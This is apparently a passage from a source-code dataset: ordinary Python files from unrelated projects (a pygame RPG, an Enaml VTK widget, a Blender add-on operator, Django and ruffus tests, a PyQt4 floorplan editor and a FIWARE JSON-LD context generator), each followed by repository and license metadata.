return "MOVE,%d,%d,%d,%s,%d,%d" % (self.x, self.y, self.mapchip, self.dest_map, self.dest_x, self.dest_y)
class Treasure():
"""宝箱"""
def __init__(self, pos, item):
self.x, self.y = pos[0], pos[1] # 宝箱座標
self.mapchip = 46 # 宝箱は46
self.image = Map.images[self.mapchip]
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
self.item = item # アイテム名
def open(self):
"""宝箱をあける"""
sounds["treasure"].play()
# TODO: アイテムを追加する処理
def draw(self, screen, offset):
"""オフセットを考慮してイベントを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def __str__(self):
return "TREASURE,%d,%d,%s" % (self.x, self.y, self.item)
class Door:
"""とびら"""
def __init__(self, pos):
self.x, self.y = pos[0], pos[1]
self.mapchip = 45
self.image = Map.images[self.mapchip]
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
def open(self):
"""とびらをあける"""
sounds["door"].play()
def draw(self, screen, offset):
"""オフセットを考慮してイベントを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def __str__(self):
return "DOOR,%d,%d" % (self.x, self.y)
class Object:
"""一般オブジェクト"""
def __init__(self, pos, mapchip):
self.x, self.y = pos[0], pos[1]
self.mapchip = mapchip
self.image = Map.images[self.mapchip]
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
def draw(self, screen, offset):
"""オフセットを考慮してイベントを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def __str__(self):
return "OBJECT,%d,%d,%d" % (self.x, self.y, mapchip)
if __name__ == "__main__":
main()
| mit | 6,963,601,677,123,207,000 | 36.736906 | 124 | 0.533536 | false |
viz4biz/PyDataNYC2015 | enaml/vtk_canvas.py | 1 | 2430 | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import (
List, Typed, ForwardTyped, ForwardInstance, observe, set_default
)
from enaml.core.declarative import d_
from .control import Control, ProxyControl
#: Delay the import of vtk until needed. This removes the hard dependecy
#: on vtk for the rest of the Enaml code base.
def vtkRenderer():
from vtk import vtkRenderer
return vtkRenderer
class ProxyVTKCanvas(ProxyControl):
""" The abstract definition of a proxy VTKCanvas object.
"""
#: A reference to the VTKCanvas declaration.
declaration = ForwardTyped(lambda: VTKCanvas)
def set_renderer(self, renderer):
raise NotImplementedError
def set_renderers(self, renderers):
raise NotImplementedError
def render(self):
raise NotImplementedError
class VTKCanvas(Control):
""" A control which can be used to embded vtk renderers.
"""
#: The vtk renderer to display in the window. This should be used
#: if only a single renderer is required for the scene.
renderer = d_(ForwardInstance(vtkRenderer))
#: The list of vtk renderers to display in the window. This should
#: be used if multiple renderers are required for the scene.
renderers = d_(List(ForwardInstance(vtkRenderer)))
#: A VTKCanvas expands freely in height and width by default.
hug_width = set_default('ignore')
hug_height = set_default('ignore')
#: A reference to the ProxyVTKCanvas object.
proxy = Typed(ProxyVTKCanvas)
def render(self):
""" Request a render of the underlying scene.
"""
if self.proxy_is_active:
self.proxy.render()
#--------------------------------------------------------------------------
# Observers
#--------------------------------------------------------------------------
@observe('renderer', 'renderers')
def _update_proxy(self, change):
""" An observer which sends state change to the proxy.
"""
# The superclass handler implementation is sufficient.
super(VTKCanvas, self)._update_proxy(change)
| apache-2.0 | 1,033,791,786,981,308,000 | 30.973684 | 79 | 0.6 | false |
feureau/Small-Scripts | Blender/Blender config/2.91/scripts/addons/bricksculpt_v1-2-0/classes/bricksculpt_choose_paintbrush_material.py | 1 | 2230 | # Copyright (C) 2019 Christopher Gearhart
# [email protected]
# http://bblanimation.com/
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# System imports
import bmesh
import math
import importlib
# Blender imports
import bpy
import bgl
from bpy.types import Operator
from bpy.props import *
# Module imports
from .bricksculpt_framework import *
from .bricksculpt_tools import *
from .bricksculpt_drawing import *
from ..functions import *
class BRICKSCULPT_OT_choose_paintbrush_material(Operator):
"""Choose the material of the active BrickSculpt paintbrush tool"""
bl_idname = "bricksculpt.choose_paintbrush_material"
bl_label = "Choose Paintbrush Material"
bl_options = {"REGISTER", "INTERNAL"}
################################################
# Blender Operator methods
@classmethod
def poll(self, context):
scn = bpy.context.scene
return scn.bricksculpt.running_active_session
def execute(self, context):
scn = context.scene
scn.bricksculpt.choosing_material = False
return {"FINISHED"}
def invoke(self, context, event):
return context.window_manager.invoke_props_dialog(self)#, event)
def draw(self, context):
scn = context.scene
layout = self.layout
layout.prop(scn.bricksculpt, "paintbrush_mat")
###################################################
# initialization method
def __init__(self):
bpy.context.window.cursor_set("DEFAULT")
###################################################
# class variables
# NONE!
###################################################
| gpl-3.0 | -3,855,508,242,255,955,000 | 29.135135 | 72 | 0.645291 | false |
SEL-Columbia/commcare-hq | custom/ilsgateway/tests/test_locations_sync.py | 1 | 1228 | import json
import os
from django.test import TestCase
from corehq.apps.commtrack.tests.util import bootstrap_domain as initial_bootstrap
from corehq.apps.locations.models import Location
from custom.ilsgateway.api import Location as Loc
from custom.ilsgateway.commtrack import sync_ilsgateway_location
TEST_DOMAIN = 'ilsgateway-commtrack-webusers-test'
class LocationSyncTest(TestCase):
def setUp(self):
self.datapath = os.path.join(os.path.dirname(__file__), 'data')
initial_bootstrap(TEST_DOMAIN)
for location in Location.by_domain(TEST_DOMAIN):
location.delete()
def test_create_location(self):
with open(os.path.join(self.datapath, 'sample_location.json')) as f:
location = Loc.from_json(json.loads(f.read()))
ilsgateway_location = sync_ilsgateway_location(TEST_DOMAIN, None, location)
self.assertEqual(ilsgateway_location.name, location.name)
self.assertEqual(ilsgateway_location.location_type, location.type)
self.assertEqual(ilsgateway_location.longitude, location.longitude)
self.assertEqual(ilsgateway_location.latitude, location.latitude)
self.assertEqual(ilsgateway_location.parent, location.parent) | bsd-3-clause | 7,645,181,924,802,932,000 | 42.892857 | 83 | 0.740228 | false |
magosil86/ruffus | ruffus/test/test_check_if_uptodate.py | 1 | 3289 | #!/usr/bin/env python
from __future__ import print_function
"""
Test check_if_uptodate
Bug: @parallel sets @check_if_uptodate to None.
Submitted by Jafar Taghiyar (jafar<dot>taghiyar<at>gmail.com)
https://github.com/bunbun/ruffus/issues/53
"""
import os
import os
tempdir = os.path.abspath(os.path.abspath(os.path.splitext(__file__)[0]))
exe_path = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
import sys
# add grandparent to search path for testing
grandparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
sys.path.insert(0, grandparent_dir)
# module name = script name without extension
module_name = os.path.splitext(os.path.basename(__file__))[0]
from ruffus import posttask, parallel, check_if_uptodate, follows, touch_file, pipeline_printout, pipeline_run
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# imports
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
import unittest
import shutil
try:
from StringIO import StringIO
except:
from io import StringIO
def sentinel_file_exists(output_file):
if not os.path.exists(output_file):
return True, "Missing file %s" % output_file
else:
return False, "File %s exists" % output_file
@posttask(touch_file(os.path.join(tempdir, "task1_completed.flag")))
@parallel([[os.path.join(tempdir, "task1_completed.flag")]])
@check_if_uptodate(sentinel_file_exists)
def task1(x):
pass
@follows(task1)
@posttask(touch_file(os.path.join(tempdir, "task2_completed.flag")))
@parallel([[os.path.join(tempdir, "task2_completed.flag")]])
@check_if_uptodate(sentinel_file_exists)
def task2(x):
pass
class Test_ruffus(unittest.TestCase):
def do_assertNotRegexpMatches (self, test_str, re_str):
import re
if re.search(re_str, test_str) is not None:
raise AssertionError("Regexp matched: %r found in %r" % (re_str, test_str))
def do_assertRegexpMatches (self, test_str, re_str):
import re
if re.search(re_str, test_str) is None:
#AssertionError:
raise AssertionError("Regexp didn't match: %r not found in %r" % (re_str, test_str))
def setUp(self):
try:
shutil.rmtree(tempdir)
except:
pass
os.makedirs(tempdir)
def tearDown(self):
try:
shutil.rmtree(tempdir)
except:
pass
def test_ruffus (self):
# run first
pipeline_run(verbose = 0)
# should now be out of date
s = StringIO()
pipeline_printout(s, verbose = 5)
ret = s.getvalue()
try:
self.do_assertRegexpMatches(ret, r"Tasks which are up-to-date:(\n\s*)*Task = 'test_check_if_uptodate.task1'(\n\s*)*Task = 'test_check_if_uptodate.task2'")
except:
print ("\n\tOops: Both tasks should be up to date!!\n\n")
raise
try:
self.do_assertNotRegexpMatches(ret, r"Jobs needs update:\s*No function to check if up-to-date")
except:
print ("\n\tOops: @check_if_uptodate is not being picked up!!\n\n")
raise
if __name__ == '__main__':
unittest.main()
| mit | 4,336,634,337,943,082,000 | 26.638655 | 166 | 0.648221 | false |
ComputerArchitectureGroupPWr/Floorplan-Maker | src/FloorplanMakerUI_old.py | 1 | 15396 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'main_window.ui'
#
# Created: Tue Aug 5 12:46:39 2014
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
from floorplanFrameBeh import FloorplanFrame
from heatersTable import HeatersTable
from thermometersTable import ThermometersTable
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_FloorplanMaker(object):
def setupUi(self, FloorplanMaker):
FloorplanMaker.setObjectName(_fromUtf8("FloorplanMaker"))
FloorplanMaker.resize(1200,700)
self.window = FloorplanMaker
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../icona.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
FloorplanMaker.setWindowIcon(icon)
self.centralwidget = QtGui.QWidget(FloorplanMaker)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.thermometers_list = []
self.horizontalLayout_4 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.verticalLayout_3 = QtGui.QVBoxLayout()
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.heaterTabLab = QtGui.QLabel(self.centralwidget)
self.heaterTabLab.setObjectName(_fromUtf8("heaterTabLab"))
self.verticalLayout_3.addWidget(self.heaterTabLab)
self.heaterTable = HeatersTable(self.centralwidget)
self.verticalLayout_3.addWidget(self.heaterTable)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.btnAddHeater = QtGui.QPushButton(self.centralwidget)
self.btnAddHeater.setMaximumSize(QtCore.QSize(71, 27))
self.btnAddHeater.setObjectName(_fromUtf8("btnAddHeater"))
self.horizontalLayout.addWidget(self.btnAddHeater)
self.btnModifyHeater = QtGui.QPushButton(self.centralwidget)
self.btnModifyHeater.setMaximumSize(QtCore.QSize(91, 27))
self.btnModifyHeater.setObjectName(_fromUtf8("btnModifyHeater"))
self.horizontalLayout.addWidget(self.btnModifyHeater)
self.btnDeleteHeater = QtGui.QPushButton(self.centralwidget)
self.btnDeleteHeater.setMaximumSize(QtCore.QSize(81, 27))
self.btnDeleteHeater.setObjectName(_fromUtf8("btnDeleteHeater"))
self.horizontalLayout.addWidget(self.btnDeleteHeater)
self.verticalLayout_3.addLayout(self.horizontalLayout)
self.label = QtGui.QLabel(self.centralwidget)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout_3.addWidget(self.label)
self.tableThermometers = ThermometersTable(self.centralwidget)
self.verticalLayout_3.addWidget(self.tableThermometers)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.btnAddTherm = QtGui.QPushButton(self.centralwidget)
self.btnAddTherm.setMaximumSize(QtCore.QSize(81, 27))
self.btnAddTherm.setObjectName(_fromUtf8("btnAddTherm"))
self.horizontalLayout_2.addWidget(self.btnAddTherm)
self.btnModifyTherm = QtGui.QPushButton(self.centralwidget)
self.btnModifyTherm.setMaximumSize(QtCore.QSize(91, 27))
self.btnModifyTherm.setObjectName(_fromUtf8("btnModifyTherm"))
self.horizontalLayout_2.addWidget(self.btnModifyTherm)
self.btnDelete = QtGui.QPushButton(self.centralwidget)
self.btnDelete.setMaximumSize(QtCore.QSize(81, 27))
self.btnDelete.setObjectName(_fromUtf8("btnDelete"))
self.horizontalLayout_2.addWidget(self.btnDelete)
self.verticalLayout_3.addLayout(self.horizontalLayout_2)
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setSizeConstraint(QtGui.QLayout.SetDefaultConstraint)
self.gridLayout.setSpacing(6)
self.gridLayout.setContentsMargins(0, 20, 0, 20)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.thermsInRowEdit = QtGui.QLineEdit(self.centralwidget)
self.thermsInRowEdit.setMaximumSize(QtCore.QSize(100, 50))
self.thermsInRowEdit.setObjectName(_fromUtf8("thermsInRowEdit"))
self.gridLayout.addWidget(self.thermsInRowEdit, 0, 1, 1, 1)
self.label_2 = QtGui.QLabel(self.centralwidget)
self.label_2.setMaximumSize(QtCore.QSize(200, 16777215))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.label_2.setText("Thermometers in row: ")
self.gridLayout.addWidget(self.label_2, 0, 0, 1, 1)
self.columnsInRowEdit = QtGui.QLineEdit(self.centralwidget)
self.columnsInRowEdit.setMaximumSize(QtCore.QSize(100, 16777215))
self.columnsInRowEdit.setObjectName(_fromUtf8("columnsInRowEdit"))
self.gridLayout.addWidget(self.columnsInRowEdit, 1, 1, 1, 1)
self.label_3 = QtGui.QLabel(self.centralwidget)
self.label_3.setMaximumSize(QtCore.QSize(200, 16777215))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.label_3.setText("Thermometers in column: ")
self.gridLayout.addWidget(self.label_3, 1, 0, 1, 1)
self.generateButton = QtGui.QPushButton(self.centralwidget)
self.generateButton.setMaximumSize(QtCore.QSize(100, 16777215))
self.generateButton.setObjectName(_fromUtf8("generateButton"))
self.generateButton.setText("Generate")
self.gridLayout.addWidget(self.generateButton, 2, 0, 1, 1)
self.generateActionCombo = QtGui.QComboBox(self.centralwidget)
self.generateActionCombo.setObjectName(_fromUtf8("generateActionCombo"))
self.generateActionCombo.addItem(_fromUtf8("Linear"))
self.generateActionCombo.addItem(_fromUtf8("Net"))
self.gridLayout.addWidget(self.generateActionCombo, 2, 1, 1, 1)
self.verticalLayout_3.addLayout(self.gridLayout)
spacerItem = QtGui.QSpacerItem(20, 118, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_3.addItem(spacerItem)
self.horizontalLayout_3.addLayout(self.verticalLayout_3)
self.verticalLayout_4 = QtGui.QVBoxLayout()
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.floorplanLab = QtGui.QLabel(self.centralwidget)
self.floorplanLab.setObjectName(_fromUtf8("floorplanLab"))
self.verticalLayout_4.addWidget(self.floorplanLab)
self.floorplanScrollArea = QtGui.QScrollArea(self.centralwidget)
self.floorplanScrollArea.setMinimumSize(QtCore.QSize(120, 160))
self.floorplanScrollArea.setMaximumSize(QtCore.QSize(725, 16777215))
self.floorplanScrollArea.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.floorplanScrollArea.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.floorplanScrollArea.setWidgetResizable(True)
self.floorplanScrollArea.setObjectName(_fromUtf8("floorplanScrollArea"))
self.scrollAreaWidgetContents_2 = QtGui.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 584, 701))
self.scrollAreaWidgetContents_2.setObjectName(_fromUtf8("scrollAreaWidgetContents_2"))
self.verticalLayoutWidget = QtGui.QWidget(self.scrollAreaWidgetContents_2)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 481, 591))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.widget = QtGui.QWidget()
self.widgetLayout = QtGui.QHBoxLayout()
self.FrameFloorplan = QtGui.QFrame()
self.FrameFloorplan.setMinimumSize(690,920)
self.FloorPlanFrame = FloorplanFrame(self.FrameFloorplan, self)
self.FloorPlanFrame.setMinimumSize(690,920)
self.FloorPlanFrame.setStyleSheet(_fromUtf8("border: 2px solid black;\n"
"border-radius: 4px;\n"
"padding: 2px;\n"
"background-color: rgb(194, 194, 194)\n"
""))
self.FloorPlanFrame.setFrameShape(QtGui.QFrame.StyledPanel)
self.FloorPlanFrame.setFrameShadow(QtGui.QFrame.Raised)
self.FloorPlanFrame.setObjectName(_fromUtf8("FloorPlanFrame"))
self.widgetLayout.addWidget(self.FrameFloorplan)
self.widget.setLayout(self.widgetLayout)
self.floorplanScrollArea.setWidget(self.widget)
FloorplanMaker.setCentralWidget(self.centralwidget)
self.verticalLayout_4.addWidget(self.floorplanScrollArea)
self.horizontalLayout_3.addLayout(self.verticalLayout_4)
self.horizontalLayout_3.setStretch(0, 2)
self.horizontalLayout_3.setStretch(1, 4)
self.horizontalLayout_4.addLayout(self.horizontalLayout_3)
FloorplanMaker.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(FloorplanMaker)
self.menubar.setGeometry(QtCore.QRect(0, 0, 997, 29))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuPlik = QtGui.QMenu(self.menubar)
self.menuPlik.setObjectName(_fromUtf8("menuPlik"))
self.menuNarz_dzia = QtGui.QMenu(self.menubar)
self.menuNarz_dzia.setObjectName(_fromUtf8("menuNarz_dzia"))
self.menuHelp = QtGui.QMenu(self.menubar)
self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
FloorplanMaker.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(FloorplanMaker)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
FloorplanMaker.setStatusBar(self.statusbar)
self.actionOpen_project = QtGui.QAction(FloorplanMaker)
self.actionOpen_project.setObjectName(_fromUtf8("actionOpen_project"))
self.actionSave_project = QtGui.QAction(FloorplanMaker)
self.actionSave_project.setObjectName(_fromUtf8("actionSave_project"))
self.actionClose = QtGui.QAction(FloorplanMaker)
self.actionClose.setObjectName(_fromUtf8("actionClose"))
self.actionNewProject = QtGui.QAction(FloorplanMaker)
self.actionNewProject.setObjectName(_fromUtf8("actionNewProject"))
self.actionOpenProject = QtGui.QAction(FloorplanMaker)
self.actionOpenProject.setObjectName(_fromUtf8("actionOpenProject"))
self.actionSave = QtGui.QAction(FloorplanMaker)
self.actionSave.setObjectName(_fromUtf8("actionSave"))
self.actionEnd = QtGui.QAction(FloorplanMaker)
self.actionEnd.setObjectName(_fromUtf8("actionEnd"))
self.actionGeneriloFile = QtGui.QAction(FloorplanMaker)
self.actionGeneriloFile.setObjectName(_fromUtf8("actionGeneriloFile"))
self.actionAbout = QtGui.QAction(FloorplanMaker)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.menuPlik.addAction(self.actionNewProject)
self.menuPlik.addAction(self.actionOpenProject)
self.menuPlik.addAction(self.actionSave)
self.menuPlik.addSeparator()
self.menuPlik.addAction(self.actionEnd)
self.menuNarz_dzia.addAction(self.actionGeneriloFile)
self.menuHelp.addAction(self.actionAbout)
self.menubar.addAction(self.menuPlik.menuAction())
self.menubar.addAction(self.menuNarz_dzia.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(FloorplanMaker)
QtCore.QObject.connect(self.actionEnd, QtCore.SIGNAL(_fromUtf8("triggered()")), FloorplanMaker.close)
QtCore.QMetaObject.connectSlotsByName(FloorplanMaker)
def retranslateUi(self, FloorplanMaker):
FloorplanMaker.setWindowTitle(QtGui.QApplication.translate("FloorplanMaker", "FloorplanMaker", None, QtGui.QApplication.UnicodeUTF8))
self.heaterTabLab.setText(QtGui.QApplication.translate("FloorplanMaker", "Placed heaters:", None, QtGui.QApplication.UnicodeUTF8))
self.btnAddHeater.setText(QtGui.QApplication.translate("FloorplanMaker", "Add", None, QtGui.QApplication.UnicodeUTF8))
self.btnModifyHeater.setText(QtGui.QApplication.translate("FloorplanMaker", "Modify", None, QtGui.QApplication.UnicodeUTF8))
self.btnDeleteHeater.setText(QtGui.QApplication.translate("FloorplanMaker", "Delete", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("FloorplanMaker", "Placed thermometers:", None, QtGui.QApplication.UnicodeUTF8))
self.btnAddTherm.setText(QtGui.QApplication.translate("FloorplanMaker", "Add", None, QtGui.QApplication.UnicodeUTF8))
self.btnModifyTherm.setText(QtGui.QApplication.translate("FloorplanMaker", "Modify", None, QtGui.QApplication.UnicodeUTF8))
self.btnDelete.setText(QtGui.QApplication.translate("FloorplanMaker", "Delete", None, QtGui.QApplication.UnicodeUTF8))
self.floorplanLab.setText(QtGui.QApplication.translate("FloorplanMaker", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Sans\'; font-size:10pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:11pt; font-weight:600; font-style:italic;\">Project Floorplan:</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.menuPlik.setTitle(QtGui.QApplication.translate("FloorplanMaker", "File", None, QtGui.QApplication.UnicodeUTF8))
self.menuNarz_dzia.setTitle(QtGui.QApplication.translate("FloorplanMaker", "Tools", None, QtGui.QApplication.UnicodeUTF8))
self.menuHelp.setTitle(QtGui.QApplication.translate("FloorplanMaker", "Help", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpen_project.setText(QtGui.QApplication.translate("FloorplanMaker", "Otwórz projekt", None, QtGui.QApplication.UnicodeUTF8))
self.actionSave_project.setText(QtGui.QApplication.translate("FloorplanMaker", "Zapisz projekt", None, QtGui.QApplication.UnicodeUTF8))
self.actionClose.setText(QtGui.QApplication.translate("FloorplanMaker", "Zamknij", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewProject.setText(QtGui.QApplication.translate("FloorplanMaker", "New project", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenProject.setText(QtGui.QApplication.translate("FloorplanMaker", "Open project", None, QtGui.QApplication.UnicodeUTF8))
self.actionSave.setText(QtGui.QApplication.translate("FloorplanMaker", "Save", None, QtGui.QApplication.UnicodeUTF8))
self.actionEnd.setText(QtGui.QApplication.translate("FloorplanMaker", "Close", None, QtGui.QApplication.UnicodeUTF8))
self.actionGeneriloFile.setText(QtGui.QApplication.translate("FloorplanMaker", "Create generilo file", None, QtGui.QApplication.UnicodeUTF8))
self.actionAbout.setText(QtGui.QApplication.translate("FloorplanMaker", "About", None, QtGui.QApplication.UnicodeUTF8))
| mit | 7,286,286,362,284,666,000 | 66.227074 | 275 | 0.725235 | false |
Fiware/dataModels | tools/ldcontext_generator.py | 1 | 9962 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This script provides two files:
- context.jsonld, that serves https://schema.lab.fiware.org/ld/fiware-data-models-context.jsonld
- mapping_list.yml, that serves https://uri.fiware.org/ns/data-models
context.jsonld is combined by extracting the properties, types and enumerations of a JSON Schema and
converting them into terms of a JSON-LD @Context. mapping_list.yml uses the result of extracting
to prepare a list of terms with schemas and specifications.
Copyright (c) 2019 FIWARE Foundation e.V.
Authors: José M. Cantera, Dmitrii Demin
"""
import json
import yaml
import os
from datetime import datetime, timezone
from argparse import ArgumentParser
# The aggregated @context will be stored here
aggregated_context = {
}
# The list of mappings (term->schema/specification) will be stored here
terms_list = {
"terms": {}
}
# The list of terms alerts will be stored here (if the specification file
# associated with the term doesn't exist)
alert_list = [
]
# Template to prepare a valid URL of a schema for a term mapping
schema_url = 'https://fiware.github.io/data-models/{}'
specification_url = 'https://fiware-datamodels.readthedocs.io/en/latest/{}'
# Agri* schemas stored at another github organization
agri_url = 'https://github.com/GSMADeveloper/NGSI-LD-Entities/blob/master/definitions/{}.md'
# Used to detect attributes which are actually relationships
ENTITY_ID = 'https://fiware.github.io/data-models/common-schema.json#/definitions/EntityIdentifierType'
def read_json(infile):
with open(infile) as data_file:
data = json.loads(data_file.read())
return data
def write_json(data, outfile):
with open(outfile, 'w') as data_file:
data_file.write(json.dumps(data, indent=4, sort_keys=True))
data_file.write("\n")
def write_yaml(data, outfile):
with open(outfile, 'w') as data_file:
data_file.write(yaml.dump(data))
# Finds a node in a JSON Schema
# (previously parsed as a Python dictionary)
def find_node(schema, node_name):
result = None
if isinstance(schema, list):
for instance in schema:
res = find_node(instance, node_name)
if res is not None:
result = res
break
elif isinstance(schema, dict):
for member in schema:
if member == node_name:
result = schema[member]
break
else:
res = find_node(schema[member], node_name)
if res is not None:
result = res
break
return result
# extracts the properties dictionary
# A list of dictionaries is returned
def extract_properties(schema):
properties = find_node(schema, 'properties')
out = []
if properties is None:
return out
for p in properties:
if p != "type" and p != "id":
prop = dict()
prop['type'] = 'Property'
prop['name'] = p
ref = find_node(properties[p], '$ref')
if ref is not None and ref == ENTITY_ID:
prop['type'] = 'Relationship'
enum = find_node(properties[p], 'enum')
if enum is not None:
prop['isEnumerated'] = True
pformat = find_node(properties[p], 'format')
if pformat is not None and pformat == 'date-time':
prop['isDate'] = True
out.append(prop)
return out
# extracts the entity type
def extract_entity_type(schema):
out = None
properties = find_node(schema, 'properties')
if properties is not None and 'type' in properties:
type_node = properties['type']
if 'enum' in type_node and len(type_node['enum']) > 0:
out = type_node['enum'][0]
return out
# extracts the enumerations
def extract_enumerations(schema):
out = []
properties = find_node(schema, 'properties')
if properties is None:
return out
for p in properties:
if p != 'type':
prop = properties[p]
enum = find_node(prop, 'enum')
if enum is not None:
if isinstance(enum, list):
for item in enum:
if isinstance(item, str):
out.append(item)
return out
# Generates the LD @context for a list of JSON Schema properties
# (which are attributes) with the URI prefix
def generate_ld_context_attrs(properties, uri_prefix, predefined_mappings):
context = {}
if properties is None:
return context
for p in properties:
p_name = p['name']
if p_name in predefined_mappings:
context[p_name] = predefined_mappings[p_name]
continue
if p['type'] == 'Relationship':
context[p_name] = {
'@type': '@id'
}
elif 'isDate' in p:
context[p_name] = {
'@type': 'https://uri.etsi.org/ngsi-ld/DateTime'
}
elif 'isEnumerated' in p:
context[p_name] = {
'@type': '@vocab'
}
if p_name in context:
context[p_name]['@id'] = uri_prefix + '#' + p_name
else:
context[p_name] = uri_prefix + '#' + p_name
return context
# Generates the LD @context for a list of JSON Schema properties
# (which are enumerated values) with the URI prefix
def generate_ld_context_enums(properties, uri_prefix, predefined_mappings):
context = {}
if properties is None:
return context
for p in properties:
if p in predefined_mappings:
context[p] = predefined_mappings[p]
else:
context[p] = uri_prefix + '#' + p
return context
# Extracts from the schema the relevant JSON-LD @context
def schema_2_ld_context(schema, uri_prefix, predefined_mappings):
properties = extract_properties(schema)
entity_type = extract_entity_type(schema)
enumerations = extract_enumerations(schema)
ld_context = dict()
ld_context['Attribute'] = generate_ld_context_attrs(
properties, uri_prefix, predefined_mappings)
ld_context['Enumeration Value'] = generate_ld_context_enums(
enumerations, uri_prefix, predefined_mappings)
ld_context['Entity Type'] = dict()
if entity_type is not None:
ld_context['Entity Type'][entity_type] = uri_prefix + '#' + entity_type
return ld_context
def process_file(input_file, uri_prefix, predefined_mappings, terms_mappings):
if os.path.isfile(input_file) and input_file.endswith('schema.json'):
print(input_file)
aggregate_ld_context(
input_file,
uri_prefix,
predefined_mappings,
terms_mappings)
elif os.path.isdir(input_file):
for f in (os.listdir(input_file)):
process_file(os.path.join(input_file, f),
uri_prefix, predefined_mappings, terms_mappings)
def aggregate_ld_context(f, uri_prefix, predefined_mappings, terms_mappings):
global aggregated_context
global terms_list
global alert_list
schema = read_json(f)
ld_context = schema_2_ld_context(schema, uri_prefix, predefined_mappings)
for t in ld_context:
for p in ld_context[t]:
aggregated_context[p] = ld_context[t][p]
# adding related specifications and schemas
if p not in terms_list['terms']:
terms_list['terms'][p] = {'specifications': list(),
'schemas': list(),
'type': t}
terms_list['terms'][p]['schemas'].append(
schema_url.format(f.split('../')[1]))
file_to_add = find_file(f, terms_mappings)
if file_to_add:
terms_list['terms'][p]['specifications'].append(file_to_add)
else:
alert_list.append(f)
# Finds the specification file associated with the term
def find_file(f, terms_mappings):
try:
spec1 = os.path.join(f.rsplit('/', 1)[0], 'doc/spec.md')
spec2 = os.path.join(f.rsplit('/', 1)[0], 'doc/introduction.md')
if os.path.isfile(spec1):
path = str(spec1.split('../specs/')
[1]).split('/spec.md')[0] + '/spec/'
return specification_url.format(path)
elif os.path.isfile(spec2):
path = str(spec2.split('../specs/')
[1]).split('/introduction.md')[0] + '/introduction/'
return specification_url.format(path)
elif 'AgriFood' in f:
